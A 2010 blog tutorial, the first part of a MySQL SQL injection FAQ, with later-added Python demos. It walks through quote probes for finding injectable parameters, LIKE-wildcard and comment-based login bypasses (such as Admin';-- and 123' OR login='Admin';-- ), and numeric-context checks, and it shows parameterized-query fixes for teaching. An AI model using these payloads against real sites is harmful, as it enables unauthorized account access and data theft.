Monday, July 26, 2010

MySQL injection full FAQ

SQL injection course

Brief article index:
0. INTRO
1. HOW TO FIND SQL INJECTION
2. WHAT CAN BE LEARNED FROM IT, AND HOW
3. WHAT TO DO IF THERE IS NO OUTPUT FIELD
4. WHAT TO DO IF SOMETHING IS FILTERED
5. USEFUL FUNCTIONS IN MYSQL
6. HOW TO PROTECT AGAINST SQL INJECTION

[0.INTRO]

Searching the internet for at least some information on SQL injection, you have surely come across articles that are either very short, or hard to understand, or cover one topic but not another, which of course left you unsatisfied. I myself had to collect 10-20 articles on the subject before I grasped the many subtleties of this vulnerability. Remembering that time, I decided to write a full FAQ on the topic so that others would not have to suffer the same way. One more request: if you find something I missed or got wrong, please write about it below; it is hard to keep everything in mind. By the way, this is my first article, so please don't throw tomatoes or kick me.

If you haven't just started breaking things today, you probably already know what SQL injection is; if not, this article is for you. SQL injection, in simple terms, is a type of attack in which the attacker modifies the application's original query to the database so that the query returns the information the attacker needs.

To absorb this article you need:
a) A brain

b) Steady hands

c) Knowledge of the SQL language


This article is written mainly for MySQL + PHP, but there are a couple of examples with MSSQL.

Actually, I think the best way to learn how SQL injection really works is not reading this article but live practice: write the most vulnerable script you can, or use mine, given at the end.

By the way, I advise reading everything in order, because each paragraph contains things that matter for the next one.

Unfortunately the article does not fit within the 20000-character limit, so it is split into several posts.
[1. HOW TO FIND SQL INJECTION]


It is still fairly easy. Put a single quote (and a double quote) into every field, parameter and cookie and watch what the application does with it.


1.1 The first case


Let's start with a script like this:


_http://xxx/news.php?id=1


Suppose the original query to the database looks like this:

Code:

SELECT * FROM news WHERE id = '1';

Now we append a quote to the "id" parameter, like so:

_http://xxx/news.php?id=1'

If the parameter is not filtered and error messages are enabled, something like this will appear:


mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''


because the query sent to the database now contains an extra quote:


Code:

SELECT * FROM news WHERE id = '1'';

If error reporting is turned off, we can still detect the vulnerability like this (it is also worth reading paragraph 1.4 so as not to confuse this with the numeric case described there):

_http://xxx/news.php?id=1';-- 

The query to the database now becomes:


Code:


SELECT * FROM news WHERE id = '1';-- ';

(For those who missed it: "--" starts a comment, and everything after it is dropped. Note that in MySQL there must be at least one whitespace character after the "--", as the MySQL documentation states, and it does not hurt to put one before it as well. Since a trailing space is easily lost from a URL, in practice it is written as "--+" or "--%20"; MySQL also accepts "#" as a line comment.) So for MySQL the query stays the same, and the page looks exactly as it does for

_http://xxx/news.php?id=1




1.2 Second case

SQL has the LIKE operator, which compares a string against a pattern. Suppose this script performs authorization by login and password with a query like this:


Code:

SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '123';


Even if the script filters the quote, it remains vulnerable. Instead of a password we simply enter "%" (for the LIKE operator the "%" symbol matches any string, and "_" matches any single character), and the query becomes:



Code:

SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '%';


and we are let in with the login 'Admin'. In this case we not only found an injection but also exploited it. Strictly speaking, no SQL syntax was injected here: the user's input is interpreted as a LIKE pattern, so escaping quotes (or even a prepared statement) does not help as long as the raw value is used as the pattern; the comparison must use "=", or "%" and "_" must be escaped.


1.3 The third case

What if the same authorization script does not filter the quote at all?


It would be foolish not to use the injection at least to get some information out. Let the query to the database be:


Code:
SELECT * FROM users WHERE login = 'Admin' AND pass = '123';


Unfortunately the password '123' does not fit, but we found that the 'login' parameter is injectable, and to log in under the nickname 'Admin' we write something like this in its place: Admin';-- . The password check is thus discarded and we log in as 'Admin'.

Code:
SELECT * FROM users WHERE login = 'Admin';-- ' AND pass = '123';


Now, what if the vulnerability is in the 'pass' field? We enter the following there: 123' OR login='Admin';-- . The query becomes:


Code:

SELECT * FROM users WHERE login = 'Admin' AND pass = '123' OR login='Admin';-- ';


For the database this is completely identical to the query (AND binds tighter than OR):


Code:

SELECT * FROM users WHERE (login = 'Admin' AND pass = '123') OR (login = 'Admin');

After these steps we become the full owner of the account with the login 'Admin'.
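The login bypasses from cases 1.2 and 1.3, as an added example that is not part of the original article: a minimal login check that builds its SQL by string concatenation the way the FAQ describes, run against an in-memory SQLite database standing in for MySQL so it works offline (SQLite does not require the space after "--" that MySQL does, otherwise the queries are identical). The users table, its two rows and the password values are constructed for the demo, and the login_safe() function is added here to show the fix; none of it is the author's code.

```python
import sqlite3


def make_users_db():
    """Constructed demo data: one admin and one ordinary user."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, login TEXT, pass TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Admin", "s3cret"), (2, "guest", "guest")],
    )
    return con


def login_like(con, login, password):
    """Case 1.2: the script strips quotes, so the attacker cannot break out
    of the string, but the comparison uses LIKE and the raw value becomes
    the pattern. A bare '%' therefore matches any password."""
    login = login.replace("'", "")
    password = password.replace("'", "")
    sql = (f"SELECT login FROM users "
           f"WHERE login LIKE '{login}' AND pass LIKE '{password}'")
    return [row[0] for row in con.execute(sql)]


def login_eq(con, login, password):
    """Case 1.3: plain '=' comparison and no filtering at all."""
    sql = (f"SELECT login FROM users "
           f"WHERE login = '{login}' AND pass = '{password}'")
    return [row[0] for row in con.execute(sql)]


def login_safe(con, login, password):
    """The fix (added here): bound parameters. The input is sent as data,
    so neither the quote nor the comment sequence is ever parsed as SQL."""
    sql = "SELECT login FROM users WHERE login = ? AND pass = ?"
    return [row[0] for row in con.execute(sql, (login, password))]


if __name__ == "__main__":
    con = make_users_db()
    # 1.2: wildcard instead of the password
    print(login_like(con, "Admin", "%"))                        # ['Admin']
    # 1.2: wildcard in both fields returns every user, the admin first
    print(login_like(con, "%", "%"))                            # ['Admin', 'guest']
    # 1.3: comment the password check away from the login field
    print(login_eq(con, "Admin';-- ", "whatever"))              # ['Admin']
    # 1.3: OR in the password field, then comment out the trailing quote
    print(login_eq(con, "Admin", "123' OR login='Admin';-- "))  # ['Admin']
    # the same payloads against the parameterized query
    print(login_safe(con, "Admin';-- ", "whatever"))            # []
    print(login_safe(con, "Admin", "%"))                        # []
```

Run it as-is to see each payload's result; the "%"/"%" pair shows why a script that takes the first returned row is the most dangerous variant, since the admin account is usually inserted first.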
1.4 The fourth case

Back to the news script. Recall from SQL that numeric parameters are not put in quotes, so for a request like

_http://xxx/news.php?id=1
the query to the database looks like this:


Code:

SELECT * FROM news WHERE id = 1;


This injection can also be detected by putting a quote into the 'id' parameter; the same error message pops up:

mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

If this message does not pop up, we can conclude that the quote is filtered, and then we need to enter

_http://xxx/news.php?id=1 bla-bla-bla

The database does not understand what bla-bla-bla is and shows an error like:

mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'bla-bla-bla'

If error reporting is turned off, check like this:

_http://xxx/news.php?id=1;-- 

The page must look exactly the same as for
_http://xxx/news.php?id=1

Two more quiet checks work only when the parameter lands in the query unquoted: id=2-1 must return the same page as id=1, and id=1 AND 1=1 must return the page while id=1 AND 1=2 returns an empty one, because arithmetic and boolean expressions are evaluated only outside a string.
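The probes from cases 1.1 and 1.4 side by side, as an added example that is not part of the original article: the same news lookup built once with the id in quotes (string context) and once without (numeric context, with the quote character stripped as in case 1.4), run against an in-memory SQLite table standing in for MySQL (SQLite does not need the trailing space after "--" that MySQL requires; the queries are otherwise the same). The news rows are constructed for the demo, news_safe() is added here as the fix, and the probe() wrapper is added to turn a database error into a return value so each probe can be compared with a clean request; none of it is the author's code. It also runs the 2-1 and AND 1=2 checks, which the article does not show.

```python
import sqlite3


def make_news_db():
    """Constructed demo data standing in for the site's news table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)",
                    [(1, "first post"), (2, "second post")])
    return con


def news_quoted(con, id_value):
    """Case 1.1: id is wrapped in quotes and nothing is filtered."""
    sql = f"SELECT id, title FROM news WHERE id = '{id_value}'"
    return con.execute(sql).fetchall()


def news_numeric(con, id_value):
    """Case 1.4: id is used unquoted; the script strips quote characters,
    so the quote probe is silent, but any other text still reaches SQL."""
    id_value = id_value.replace("'", "")
    sql = f"SELECT id, title FROM news WHERE id = {id_value}"
    return con.execute(sql).fetchall()


def news_safe(con, id_value):
    """The fix (added here): validate the type, then bind the value."""
    try:
        id_int = int(id_value)
    except ValueError:
        return []
    return con.execute("SELECT id, title FROM news WHERE id = ?",
                       (id_int,)).fetchall()


def probe(fn, con, payload):
    """Run one probe and report ('ok', rows) or ('error', message), so a
    silent site (errors off) can be judged by 'same page as id=1' alone."""
    try:
        return "ok", fn(con, payload)
    except sqlite3.Error as exc:
        return "error", str(exc)


if __name__ == "__main__":
    con = make_news_db()
    clean = news_quoted(con, "1")
    for label, fn, payload in [
        ("1.1 quote",           news_quoted,  "1'"),
        ("1.1 comment",         news_quoted,  "1';-- "),
        ("1.4 quote filtered",  news_numeric, "1'"),
        ("1.4 garbage",         news_numeric, "1 bla-bla-bla"),
        ("1.4 comment",         news_numeric, "1;-- "),
        ("1.4 arithmetic",      news_numeric, "2-1"),
        ("1.4 false condition", news_numeric, "1 AND 1=2"),
        ("fixed",               news_safe,    "1';-- "),
    ]:
        status, result = probe(fn, con, payload)
        same = status == "ok" and result == clean
        print(f"{label:20} {payload!r:18} -> {status}, same page as id=1: {same}")
```

The "1.4 quote filtered" line is the trap the article warns about: the quote probe shows nothing because the script strips it, yet the garbage, arithmetic and boolean probes all prove the value is still pasted into the query.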

The rest of the lesson continues in the next post ^_^

